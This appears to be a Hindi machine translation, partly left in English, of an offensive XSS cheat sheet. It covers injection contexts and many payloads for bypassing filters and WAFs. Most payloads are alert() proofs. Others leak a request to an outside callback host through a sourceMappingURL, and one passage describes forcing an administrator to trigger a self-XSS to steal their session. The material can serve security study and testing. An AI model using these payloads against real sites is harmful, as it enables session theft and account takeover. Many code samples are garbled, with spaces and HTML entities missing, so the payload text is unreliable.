जांचें कि कोई भी मान जिसे आप नियंत्रित करते हैं (पैरामीटर, पथ, हेडर?, कुकीज़?) HTML में परावर्तित हो रहा है या JS कोड द्वारा उपयोग किया जा रहा है।
संदर्भ खोजें जहां यह परावर्तित/उपयोग किया गया है।
यदि परावर्तित है
जांचें आप कौन से प्रतीकों का उपयोग कर सकते हैं और उसके आधार पर, पेलोड तैयार करें:
कच्चे HTML में:
क्या आप नए HTML टैग बना सकते हैं?
क्या आप javascript: प्रोटोकॉल का समर्थन करने वाले इवेंट या विशेषताएँ उपयोग कर सकते हैं?
क्या आप सुरक्षा को बायपास कर सकते हैं?
क्या HTML सामग्री को किसी क्लाइंट साइड JS इंजन (AngularJS, VueJS, Mavo...) द्वारा व्याख्यायित किया जा रहा है, आप क्लाइंट साइड टेम्पलेट इंजेक्शन का दुरुपयोग कर सकते हैं।
XSS का सफलतापूर्वक शोषण करने के लिए, आपको सबसे पहले एक मान खोजने की आवश्यकता है जिसे आप नियंत्रित करते हैं और जो वेब पृष्ठ में परावर्तित हो रहा है।
अंतरिम रूप से परावर्तित: यदि आप पाते हैं कि किसी पैरामीटर का मान या यहां तक कि पथ वेब पृष्ठ में परावर्तित हो रहा है, तो आप परावर्तित XSS का शोषण कर सकते हैं।
संग्रहीत और परावर्तित: यदि आप पाते हैं कि एक मान जिसे आप नियंत्रित करते हैं, सर्वर में सहेजा गया है और हर बार जब आप एक पृष्ठ तक पहुँचते हैं तो यह परावर्तित होता है, तो आप संग्रहीत XSS का शोषण कर सकते हैं।
JS के माध्यम से पहुँचा गया: यदि आप पाते हैं कि एक मान जिसे आप नियंत्रित करते हैं, JS का उपयोग करके पहुँच रहा है, तो आप DOM XSS का शोषण कर सकते हैं।
संदर्भ
जब आप XSS का शोषण करने की कोशिश कर रहे हों, तो सबसे पहले आपको यह जानने की आवश्यकता है कि आपका इनपुट कहाँ परावर्तित हो रहा है। संदर्भ के आधार पर, आप विभिन्न तरीकों से मनमाना JS कोड निष्पादित कर सकेंगे।
कच्चा HTML
यदि आपका इनपुट कच्चे HTML पृष्ठ पर परावर्तित होता है, तो आपको JS कोड निष्पादित करने के लिए कुछ HTML टैग का दुरुपयोग करने की आवश्यकता होगी: <img , <iframe , <svg , <script ... ये कुछ संभावित HTML टैग हैं जिनका आप उपयोग कर सकते हैं।
इसके अलावा, क्लाइंट साइड टेम्पलेट इंजेक्शन को ध्यान में रखें।
HTML टैग विशेषता के अंदर
यदि आपका इनपुट किसी टैग की विशेषता के मान के अंदर परावर्तित होता है, तो आप कोशिश कर सकते हैं:
विशेषता और टैग से बाहर निकलने के लिए (फिर आप कच्चे HTML में होंगे) और दुरुपयोग के लिए नया HTML टैग बनाने के लिए: "><img [...]
यदि आप विशेषता से बाहर निकल सकते हैं लेकिन टैग से नहीं (> को एन्कोड किया गया है या हटा दिया गया है), तो आप एक इवेंट बना सकते हैं जो JS कोड निष्पादित करता है: " autofocus onfocus=alert(1) x="
यदि आप विशेषता से बाहर नहीं निकल सकते (" को एन्कोड किया गया है या हटा दिया गया है), तो यह निर्भर करता है कि कौन सी विशेषता में आपका मान परावर्तित हो रहा है यदि आप पूरे मान को नियंत्रित करते हैं या केवल एक भाग आप इसका दुरुपयोग कर सकेंगे। उदाहरण के लिए, यदि आप एक इवेंट जैसे onclick= को नियंत्रित करते हैं, तो आप इसे क्लिक करने पर मनमाना कोड निष्पादित करने के लिए बना सकेंगे। एक और दिलचस्प उदाहरण विशेषता href है, जहां आप मनमाना कोड निष्पादित करने के लिए javascript: प्रोटोकॉल का उपयोग कर सकते हैं: href="javascript:alert(1)"
यदि आपका इनपुट "अविकसित टैग" के अंदर परावर्तित होता है, तो आप accesskey ट्रिक का प्रयास कर सकते हैं (आपको इसे शोषित करने के लिए किसी प्रकार की सामाजिक इंजीनियरिंग की आवश्यकता होगी): " accesskey="x" onclick="alert(1)" x="
यदि आप एक वर्ग नाम को नियंत्रित करते हैं तो Angular द्वारा XSS निष्पादित करने का अजीब उदाहरण:
इस मामले में आपका इनपुट <script> [...] </script> टैग के बीच, एक HTML पृष्ठ के अंदर, एक .js फ़ाइल के अंदर या javascript: प्रोटोकॉल का उपयोग करते हुए एक विशेषता के अंदर परिलक्षित होता है:
यदि <script> [...] </script> टैग के बीच परिलक्षित होता है, तो भले ही आपका इनपुट किसी भी प्रकार के उद्धरण के अंदर हो, आप </script> को इंजेक्ट करने और इस संदर्भ से बाहर निकलने का प्रयास कर सकते हैं। यह काम करता है क्योंकि ब्राउज़र पहले HTML टैग को पार्स करेगा और फिर सामग्री को, इसलिए, यह नहीं देखेगा कि आपका इंजेक्ट किया गया </script> टैग HTML कोड के अंदर है।
यदि JS स्ट्रिंग के अंदर परिलक्षित होता है और अंतिम ट्रिक काम नहीं कर रही है, तो आपको स्ट्रिंग से बाहर निकलना, अपना कोड निष्पादित करना और JS कोड को पुनर्निर्माण करना होगा (यदि कोई त्रुटि है, तो इसे निष्पादित नहीं किया जाएगा):
'-alert(1)-'
';-alert(1)//
\';alert(1)//
यदि टेम्पलेट लिटेरल के अंदर परिलक्षित होता है, तो आप ${ ... } सिंटैक्स का उपयोग करके JS एक्सप्रेशंस को एंबेड कर सकते हैं: var greetings = `Hello, ${alert(1)}`
Unicode एन्कोडमान्य जावास्क्रिप्ट कोड लिखने के लिए काम करता है:
\u{61}lert(1)\u0061lert(1)\u{0061}lert(1)
Javascript Hoisting
Javascript Hoisting उस अवसर को संदर्भित करता है जहाँ आप कार्यों, चर या कक्षाओं को उनके उपयोग के बाद घोषित कर सकते हैं ताकि आप उन परिदृश्यों का दुरुपयोग कर सकें जहाँ XSS अव्यवस्थित चर या कार्यों का उपयोग कर रहा है।अधिक जानकारी के लिए निम्नलिखित पृष्ठ देखें:
कई वेब पृष्ठों में ऐसे एंडपॉइंट होते हैं जो कार्य को निष्पादित करने के लिए फ़ंक्शन के नाम को पैरामीटर के रूप में स्वीकार करते हैं। एक सामान्य उदाहरण जो वास्तविक जीवन में देखने को मिलता है वह है: ?callback=callbackFunc.
यह पता लगाने का एक अच्छा तरीका है कि क्या उपयोगकर्ता द्वारा सीधे दिया गया कुछ निष्पादित करने की कोशिश कर रहा है, पैरामीटर मान को संशोधित करना (उदाहरण के लिए 'Vulnerable' में) और कंसोल में त्रुटियों की तलाश करना जैसे:
यदि यह संवेदनशील है, तो आप केवल मान भेजकर एक अलर्ट ट्रिगर कर सकते हैं: ?callback=alert(1)। हालाँकि, यह बहुत सामान्य है कि ये एंडपॉइंट सामग्री को मान्य करेंगे ताकि केवल अक्षरों, संख्याओं, बिंदुओं और अंडरस्कोर की अनुमति दी जा सके ([\w\._]).
हालांकि, उस सीमा के बावजूद कुछ क्रियाएँ करना अभी भी संभव है। इसका कारण यह है कि आप उन मान्य वर्णों का उपयोग करके DOM में किसी भी तत्व तक पहुँच सकते हैं:
आप सीधे Javascript फ़ंक्शन को भी ट्रिगर करने की कोशिश कर सकते हैं: obj.sales.delOrders।
हालांकि, आमतौर पर निर्दिष्ट फ़ंक्शन को निष्पादित करने वाले एंडपॉइंट्स ऐसे एंडपॉइंट्स होते हैं जिनमें ज्यादा दिलचस्प DOM नहीं होता है, समान मूल के अन्य पृष्ठों में ज्यादा दिलचस्प DOM होगा ताकि अधिक क्रियाएँ की जा सकें।
इसलिए, विभिन्न DOM में इस कमजोरियों का दुरुपयोग करने के लिएSame Origin Method Execution (SOME) शोषण विकसित किया गया:
यहाँ JS कोड है जो असुरक्षित तरीके से कुछ हमलावर द्वारा नियंत्रित डेटा का उपयोग कर रहा है जैसे location.href। एक हमलावर, इसे मनमाने JS कोड को निष्पादित करने के लिए दुरुपयोग कर सकता है।
इस प्रकार के XSS कहीं भी पाए जा सकते हैं। ये केवल एक वेब एप्लिकेशन के क्लाइंट शोषण पर निर्भर नहीं करते बल्कि किसी भीसंदर्भ पर निर्भर करते हैं। इस प्रकार के मनमाने JavaScript निष्पादन का दुरुपयोग RCE प्राप्त करने, क्लाइंट्स और सर्वर्स में मनमाने फ़ाइलों को पढ़ने, और अधिक के लिए भी किया जा सकता है।
कुछ उदाहरण:
जब आपका इनपुट HTML पृष्ठ के अंदर परिलक्षित होता है या आप इस संदर्भ में HTML कोड को बचा सकते हैं और इंजेक्ट कर सकते हैं, तो पहली चीज़ जो आपको करनी चाहिए वह यह है कि आप जांचें कि क्या आप < का दुरुपयोग करके नए टैग बना सकते हैं: बस उस चर को परिलक्षित करने की कोशिश करें और जांचें कि क्या इसे HTML एन्कोडेड किया गया है या हटाया गया है या यदि यह बिना बदलाव के परिलक्षित हो रहा है। केवल अंतिम मामले में आप इस मामले का शोषण कर पाएंगे।
इन मामलों के लिए याद रखेंClient Side Template Injection।नोट: एक HTML टिप्पणी को बंद करने के लिए******** --> या ****--!>
इस मामले में और यदि कोई ब्लैक/व्हाइटलिस्टिंग का उपयोग नहीं किया गया है, तो आप ऐसे पे लोड का उपयोग कर सकते हैं:
But, if tags/attributes black/whitelisting is being used, you will need to brute-force which tags you can create.
Once you have located which tags are allowed, you would need to brute-force attributes/events inside the found valid tags to see how you can attack the context.
Tags/Events brute-force
Go to https://portswigger.net/web-security/cross-site-scripting/cheat-sheet and click on Copy tags to clipboard. Then, send all of them using Burp intruder and check if any tags wasn't discovered as malicious by the WAF. Once you have discovered which tags you can use, you can brute force all the events using the valid tags (in the same web page click on Copy events to clipboard and follow the same procedure as before).
Custom tags
If you didn't find any valid HTML tag, you could try to create a custom tag and and execute JS code with the onfocus attribute. In the XSS request, you need to end the URL with # to make the page focus on that object and execute the code:
यदि किसी प्रकार की ब्लैकलिस्ट का उपयोग किया जा रहा है, तो आप कुछ बेवकूफी भरे ट्रिक्स के साथ इसे बायपास करने की कोशिश कर सकते हैं:
//Random capitalization<script> --> <ScrIpT><img --> <ImG//Double tag, in case just the first match is removed<script><script><scr<script>ipt><SCRscriptIPT>alert(1)</SCRscriptIPT>//You can substitude the space to separate attributes for://*%00//%00*/%2F%0D%0C%0A%09//Unexpected parent tags<svg><x><script>alert('1')</x>//Unexpected weird attributes<script x><scripta="1234"><script ~~~><script/random>alert(1)</script><script ///Note the newline>alert(1)</script><scr\x00ipt>alert(1)</scr\x00ipt>//Not closing tag, ending with " <" or " //"<iframeSRC="javascript:alert('XSS');" <<iframe SRC="javascript:alert('XSS');"////Extra open<<script>alert("XSS");//<</script>//Just weird an unexpected, use your imagination<</script/script><script><input type=image srconerror="prompt(1)">//Using `` instead of parenthesisonerror=alert`1`//Use more than one<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
<!-- Taken from the blog of Jorge Lajara --><svg/onload=alert``><scriptsrc=//aa.es><scriptsrc=//℡㏛.pw>
The last one is using 2 unicode characters which expands to 5: telsr
इनमें से अधिक वर्ण यहाँ पाए जा सकते हैं।
यह जांचने के लिए कि कौन से वर्ण विघटित होते हैं, यहाँ देखें।
Click XSS - Clickjacking
यदि भेद्यता का लाभ उठाने के लिए आपको उपयोगकर्ता को एक लिंक या एक फॉर्म पर क्लिक करने की आवश्यकता है जिसमें पूर्व-भरे हुए डेटा हैं, तो आप Clickjacking का दुरुपयोग करने की कोशिश कर सकते हैं (यदि पृष्ठ भेद्य है)।
Impossible - Dangling Markup
यदि आप केवल यह सोचते हैं कि JS कोड निष्पादित करने के लिए एक HTML टैग के साथ एक विशेषता बनाना असंभव है, तो आपको Dangling Markup की जांच करनी चाहिए क्योंकि आप भेद्यता का लाभ उठा सकते हैंबिनाJS कोड निष्पादित किए।
Injecting inside HTML tag
Inside the tag/escaping from attribute value
यदि आप HTML टैग के अंदर हैं, तो आप जो पहली चीज़ कर सकते हैं वह है टैग से बाहर निकलना और पिछले अनुभाग में उल्लिखित कुछ तकनीकों का उपयोग करना ताकि JS कोड निष्पादित किया जा सके।
यदि आप टैग से बाहर नहीं निकल सकते, तो आप टैग के अंदर नए विशेषताएँ बना सकते हैं ताकि JS कोड निष्पादित करने की कोशिश की जा सके, उदाहरण के लिए कुछ पेलोड का उपयोग करके जैसे (ध्यान दें कि इस उदाहरण में विशेषता से बाहर निकलने के लिए डबल उद्धरण चिह्नों का उपयोग किया गया है, यदि आपका इनपुट सीधे टैग के अंदर परिलक्षित होता है तो आपको उनकी आवश्यकता नहीं होगी):
<p style="animation: x;" onanimationstart="alert()">XSS</p><p style="animation: x;" onanimationend="alert()">XSS</p>#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
Within the attribute
यहां तक कि अगर आप attribute से भाग नहीं सकते (" को एन्कोड या हटा दिया गया है), यह इस पर निर्भर करता है कि आपका मान किस attribute में परिलक्षित हो रहा हैयदि आप सभी मान को नियंत्रित करते हैं या केवल एक भाग तो आप इसका दुरुपयोग कर सकेंगे। उदाहरण के लिए, यदि आप एक इवेंट को नियंत्रित करते हैं जैसे onclick= तो आप इसे क्लिक करने पर मनमाना कोड निष्पादित करने के लिए बना सकेंगे।
एक और दिलचस्प उदाहरण है attribute href, जहां आप javascript: प्रोटोकॉल का उपयोग करके मनमाना कोड निष्पादित कर सकते हैं: href="javascript:alert(1)"
HTML एन्कोडिंग/URL एन्कोड का उपयोग करके इवेंट के अंदर बायपास करें
HTML टैग के attributes के मान के अंदर HTML एन्कोडेड कैरेक्टर्सरनटाइम पर डिकोड होते हैं। इसलिए निम्नलिखित कुछ इस तरह मान्य होगा (पेलोड बोल्ड में है): <a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Go Back </a>
ध्यान दें कि किसी भी प्रकार की HTML एन्कोड मान्य है:
//HTML entities'-alert(1)-'//HTML hex without zeros'-alert(1)-'//HTML hex with zeros'-alert(1)-'//HTML dec without zeros'-alert(1)-'//HTML dec with zeros'-alert(1)-'<ahref="javascript:var a=''-alert(1)-''">a</a><ahref="javascript:alert(2)">a</a><ahref="javascript:alert(3)">a</a>
यूनिकोड एन्कोड का उपयोग करके इनसाइड इवेंट बायपास करें
//For some reason you can use unicode to encode "alert" but not "(1)"<imgsrconerror=\u0061\u006C\u0065\u0072\u0074(1) /><imgsrconerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
विशेष प्रोटोकॉल विशेषता के भीतर
यहां आप कुछ स्थानों पर javascript: या data: प्रोटोकॉल का उपयोग कर सकते हैं मनमाने JS कोड को निष्पादित करने के लिए। कुछ को उपयोगकर्ता इंटरैक्शन की आवश्यकता होगी और कुछ को नहीं।
javascript:alert(1)JavaSCript:alert(1)javascript:%61%6c%65%72%74%28%31%29//URL encodejavascript:alert(1)javascript:alert(1)javascript:alert(1)javascriptΪlert(1)java //Note the new linescript:alert(1)data:text/html,<script>alert(1)</script>DaTa:text/html,<script>alert(1)</script>data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3edata:text/html;charset=UTF-8,<script>alert(1)</script>data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pgdata:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
इन स्थानों पर आप इन प्रोटोकॉल को इंजेक्ट कर सकते हैं
सामान्यतःjavascript: प्रोटोकॉल को किसी भी टैग में उपयोग किया जा सकता है जो href विशेषता को स्वीकार करता है और अधिकतर टैग में जो src विशेषता को स्वीकार करते हैं (लेकिन <img> नहीं)
इसके अलावा, इन मामलों के लिए एक और अच्छा ट्रिक है: भले ही आपका इनपुट javascript:... के अंदर URL एन्कोडेड हो, यह निष्पादन से पहले URL डिकोड किया जाएगा। इसलिए, यदि आपको स्ट्रिंग से एकल उद्धरण का एस्केप करना है और आप देखते हैं कि यह URL एन्कोडेड है, तो याद रखें कि इससे कोई फर्क नहीं पड़ता, इसे निष्पादन के समय एकल उद्धरण के रूप में व्याख्यायित किया जाएगा।
ध्यान दें कि यदि आप दोनोंURLencode + HTMLencode को किसी भी क्रम में payload को एन्कोड करने के लिए उपयोग करने की कोशिश करते हैं, तो यह काम नहीं करेगा, लेकिन आप payload के अंदर उन्हें मिला सकते हैं।
javascript: के साथ Hex और Octal एन्कोड का उपयोग करना
आप Hex और Octal एन्कोड का उपयोग iframe के src विशेषता के अंदर (कम से कम) JS को निष्पादित करने के लिए HTML टैग घोषित करने के लिए कर सकते हैं:
//Encoded: <svg onload=alert(1)>// This WORKS<iframesrc=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' /><iframesrc=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />//Encoded: alert(1)// This doesn't work<svgonload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' /><svgonload=javascript:'\141\154\145\162\164\50\61\51' />
रिवर्स टैब नबिंग
<atarget="_blank"rel="opener"
यदि आप किसी भी URL को मनमाने <a href= टैग में इंजेक्ट कर सकते हैं जिसमें target="_blank" और rel="opener" विशेषताएँ हैं, तो इस व्यवहार का लाभ उठाने के लिए निम्नलिखित पृष्ठ की जांच करें:
<!-- Injection inside meta attribute--><metaname="apple-mobile-web-app-title"content=""Twitterpopoverid="newsletter"onbeforetoggle=alert(2) /><!-- Existing target--><buttonpopovertarget="newsletter">Subscribe to newsletter</button><divpopoverid="newsletter">Newsletter popup</div>
From यहाँ: आप एक XSS पेलोड को एक छिपे हुए विशेषता के अंदर निष्पादित कर सकते हैं, बशर्ते आप शिकार को की संयोजन दबाने के लिए राजी कर सकें। Firefox Windows/Linux पर की संयोजन ALT+SHIFT+X है और OS X पर यह CTRL+ALT+X है। आप एक्सेस की विशेषता में एक अलग कुंजी का उपयोग करके एक अलग की संयोजन निर्दिष्ट कर सकते हैं। यहाँ वेक्टर है:
यदि आपने वेब के एक बहुत छोटे हिस्से में XSS पाया है जो किसी प्रकार की इंटरैक्शन की आवश्यकता है (शायद फुटर में एक छोटा लिंक जिसमें एक onmouseover तत्व है), तो आप उस तत्व द्वारा कब्जा की गई जगह को संशोधित करने की कोशिश कर सकते हैं ताकि लिंक के सक्रिय होने की संभावनाओं को अधिकतम किया जा सके।
उदाहरण के लिए, आप तत्व में कुछ स्टाइलिंग जोड़ सकते हैं जैसे: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5
लेकिन, यदि WAF स्टाइल विशेषता को फ़िल्टर कर रहा है, तो आप CSS स्टाइलिंग गैजेट्स का उपयोग कर सकते हैं, इसलिए यदि आप, उदाहरण के लिए, पाते हैं
.test {display:block; color: blue; width: 100%}
और
#someid {top: 0; font-family: Tahoma;}
अब आप हमारे लिंक को संशोधित कर सकते हैं और इसे इस रूप में ला सकते हैं
इन मामलों में आपका इनपुटJS कोड के एक .js फ़ाइल या <script>...</script> टैग के बीच या HTML इवेंट्स के बीच जो JS कोड निष्पादित कर सकते हैं या उन विशेषताओं के बीच जो javascript: प्रोटोकॉल को स्वीकार करते हैं, में प्रतिबिंबित होने जा रहा है।
<script> टैग को एस्केप करना
यदि आपका कोड <script> [...] var input = 'reflected data' [...] </script> के भीतर डाला गया है, तो आप आसानी से <script> टैग को बंद करके एस्केप कर सकते हैं:
ध्यान दें कि इस उदाहरण में हमने एकल उद्धरण को भी बंद नहीं किया है। इसका कारण यह है कि HTML पार्सिंग पहले ब्राउज़र द्वारा की जाती है, जिसमें पृष्ठ तत्वों की पहचान करना शामिल है, जिसमें स्क्रिप्ट के ब्लॉक भी शामिल हैं। JavaScript का पार्सिंग, अंतर्निहित स्क्रिप्ट को समझने और निष्पादित करने के लिए, केवल बाद में किया जाता है।
JS कोड के अंदर
यदि <> को साफ किया जा रहा है, तो आप अभी भी स्ट्रिंग को एस्केप कर सकते हैं जहां आपका इनपुट स्थित है और मनमाने JS को निष्पादित कर सकते हैं। JS सिंटैक्स को ठीक करना महत्वपूर्ण है, क्योंकि यदि कोई त्रुटियाँ हैं, तो JS कोड निष्पादित नहीं होगा:
स्ट्रिंग्स को एकल और दोहरे उद्धरणों के अलावा बनाने के लिए, JS बैकटिक्स`` को भी स्वीकार करता है। इसे टेम्पलेट लिटेरल कहा जाता है क्योंकि यह ${ ... } सिंटैक्स का उपयोग करके JS एक्सप्रेशंस को एंबेड करने की अनुमति देता है।
इसलिए, यदि आप पाते हैं कि आपका इनपुट एक JS स्ट्रिंग के अंदर प्रतिबिंबित हो रहा है जो बैकटिक्स का उपयोग कर रहा है, तो आप मनमाने JS कोड को निष्पादित करने के लिए ${ ... } सिंटैक्स का दुरुपयोग कर सकते हैं:
इसका दुरुपयोग किया जा सकता है:
`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
// This is valid JS code, because each time the function returns itself it's recalled with ``functionloop(){return loop}loop``````````````
एन्कोडेड कोड निष्पादन
<script>\u0061lert(1)</script>
<svg><script>alert('1')
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
'\b'//backspace'\f'//form feed'\n'//new line'\r'//carriage return'\t'//tab'\b'//backspace'\f'//form feed'\n'//new line'\r'//carriage return'\t'//tab// Any other char escaped is just itself
//This is a 1 line comment/* This is a multiline comment*/<!--This is a 1line comment#!This is a 1 line comment, but "#!" must to be at the beggining of the first line-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
//Javascript interpret as new line these chars:String.fromCharCode(10); alert('//\nalert(1)') //0x0aString.fromCharCode(13); alert('//\ralert(1)') //0x0dString.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
जावास्क्रिप्ट व्हाइटस्पेस
log=[];functionfunct(){}for(let i=0;i<=0x10ffff;i++){try{eval(`funct${String.fromCodePoint(i)}()`);log.push(i);}catch(e){}}console.log(log)//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:<img/src/onerror=alert(1)>
एक टिप्पणी के अंदर जावास्क्रिप्ट
//If you can only inject inside a JS comment, you can still leak something//If the user opens DevTools request to the indicated sourceMappingURL will be send//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
बिना कोष्ठक के JavaScript
// By setting locationwindow.location='javascript:alert\x281\x29'x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x// or any DOMXSS sink such as location=name// Backtips// Backtips pass the string as an array of lenght 1alert`1`// Backtips + Tagged Templates + call/applyeval`alert\x281\x29`// This won't work as it will just return the passed arraysetTimeout`alert\x281\x29`eval.call`${'alert\x281\x29'}`eval.apply`${[`alert\x281\x29`]}`[].sort.call`${alert}1337`[].map.call`${eval}\\u{61}lert\x281337\x29`// To pass several arguments you can usefunctionbtt(){console.log(arguments);}btt`${'arg1'}${'arg2'}${'arg3'}`//It's possible to construct a function and call itFunction`x${'alert(1337)'}x```// .replace can use regexes and call a function if something is found"a,".replace`a${alert}`//Initial ["a"] is passed to str as "a," and thats why the initial string is "a,""a".replace.call`1${/./}${alert}`// This happened in the previous example// Change "this" value of call to "1,"// match anything with regex /./// call alert with "1""a".replace.call`1337${/..../}${alert}`//alert with 1337 instead// Using Reflect.apply to call any function with any argumnetsReflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`// Using Reflect.set to call set any value to a variableReflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString// These operations are called when the object is used as a primitive// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''toString=alert;window+''// Error handlerwindow.onerror=eval;throw"=alert\x281\x29";onerror=eval;throw"=alert\x281\x29";<imgsrc=x onerror="window.onerror=eval;throw'=alert\x281\x29'">{onerror=eval}throw"=alert(1)" //No ";"onerror=alert //No ";" using new linethrow 1337// Error handler + Special unicode separatorseval("onerror=\u2028alert\u2029throw 1337");// Error handler + Comma separator// The comma separator goes through the list and returns only the last elementvar a = (1,2,3,4,5,6) // a = 6throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alertthrow onerror=alert,1,1,1,1,1,1337// optional exception variables inside a catch clause.try{throw onerror=alert}catch{throw 1}// Has instance symbol'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
//Eval like functionseval('ale'+'rt(1)')setTimeout('ale'+'rt(2)');setInterval('ale'+'rt(10)');Function('ale'+'rt(10)')``;[].constructor.constructor("alert(document.domain)")``[]["constructor"]["constructor"]`$${alert()}```import('data:text/javascript,alert(1)')//General function executions``//Can be use as parenthesisalert`document.cookie`alert(document['cookie'])with(document)alert(cookie)(alert)(1)(alert(1))in"."a=alert,a(1)[1].find(alert)window['alert'](0)parent['alert'](1)self['alert'](2)top['alert'](3)this['alert'](4)frames['alert'](5)content['alert'](6)[7].map(alert)[8].find(alert)[9].every(alert)[10].filter(alert)[11].findIndex(alert)[12].forEach(alert);top[/al/.source+/ert/.source](1)top[8680439..toString(30)](1)Function("ale"+"rt(1)")();newFunction`al\ert\`6\``;Set.constructor('ale'+'rt(13)')();Set.constructor`al\x65rt\x2814\x29```;$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)globalThis[`al`+/ert/.source]`1`this[`al`+/ert/.source]`1`[alert][0].call(this,1)window['a'+'l'+'e'+'r'+'t']()window['a'+'l'+'e'+'r'+'t'].call(this,1)top['a'+'l'+'e'+'r'+'t'].apply(this,[1])(1,2,3,4,5,6,7,8,alert)(1)x=alert,x(1)[1].find(alert)top["al"+"ert"](1)top[/al/.source+/ert/.source](1)al\u0065rt(1)al\u0065rt`1`top['al\145rt'](1)top['al\x65rt'](1)top[8680439..toString(30)](1)<svg><animateonbegin=alert() attributeName=x></svg>
DOM कमजोरियाँ
यहाँ JS कोड है जो एक हमलावर द्वारा नियंत्रित असुरक्षित डेटा का उपयोग कर रहा है जैसे location.href। एक हमलावर, इसे मनमाने JS कोड को निष्पादित करने के लिए दुरुपयोग कर सकता है।
व्याख्या के विस्तार के कारणDOM कमजोरियों को इस पृष्ठ पर स्थानांतरित किया गया है:
वहाँ आपको DOM कमजोरियों के बारे में विस्तृत व्याख्या मिलेगी, ये कैसे उत्पन्न होती हैं, और इन्हें कैसे शोषण किया जा सकता है।
इसके अलावा, यह न भूलें कि उल्लेखित पोस्ट के अंत में आप DOM Clobbering हमलों के बारे में एक व्याख्या पा सकते हैं।
Self-XSS को अपग्रेड करना
कुकी XSS
यदि आप एक कुकी के अंदर पेलोड भेजकर XSS को ट्रिगर कर सकते हैं, तो यह आमतौर पर एक self-XSS है। हालाँकि, यदि आप XSS के लिए कमजोर उपडोमेन पाते हैं, तो आप इस XSS का दुरुपयोग करके पूरे डोमेन में एक कुकी इंजेक्ट कर सकते हैं, जिससे मुख्य डोमेन या अन्य उपडोमेन (जो कुकी XSS के लिए कमजोर हैं) में कुकी XSS को ट्रिगर किया जा सके। इसके लिए आप कुकी टॉसिंग हमले का उपयोग कर सकते हैं:
शायद एक उपयोगकर्ता अपने प्रोफ़ाइल को व्यवस्थापक के साथ साझा कर सकता है और यदि self XSS उपयोगकर्ता के प्रोफ़ाइल में है और व्यवस्थापक इसे एक्सेस करता है, तो वह कमजोरियों को ट्रिगर करेगा।
सत्र मिररिंग
यदि आप कुछ self XSS पाते हैं और वेब पृष्ठ में व्यवस्थापकों के लिए सत्र मिररिंग है, उदाहरण के लिए, ग्राहकों को मदद मांगने की अनुमति देना और व्यवस्थापक को आपकी मदद करने के लिए, वह आपके सत्र में जो देख रहा है, वही देखेगा लेकिन अपने सत्र से।
आप व्यवस्थापक को आपके self XSS को ट्रिगर करने और उसकी कुकीज़/सत्र चुराने के लिए मजबूर कर सकते हैं।
अन्य बायपास
सामान्यीकृत यूनिकोड
आप यह जांच सकते हैं कि प्रतिबिंबित मान सर्वर (या क्लाइंट साइड) में यूनिकोड सामान्यीकृत हो रहे हैं और इस कार्यक्षमता का दुरुपयोग करके सुरक्षा को बायपास कर सकते हैं। यहाँ एक उदाहरण खोजें.
PHP FILTER_VALIDATE_EMAIL ध्वज बायपास
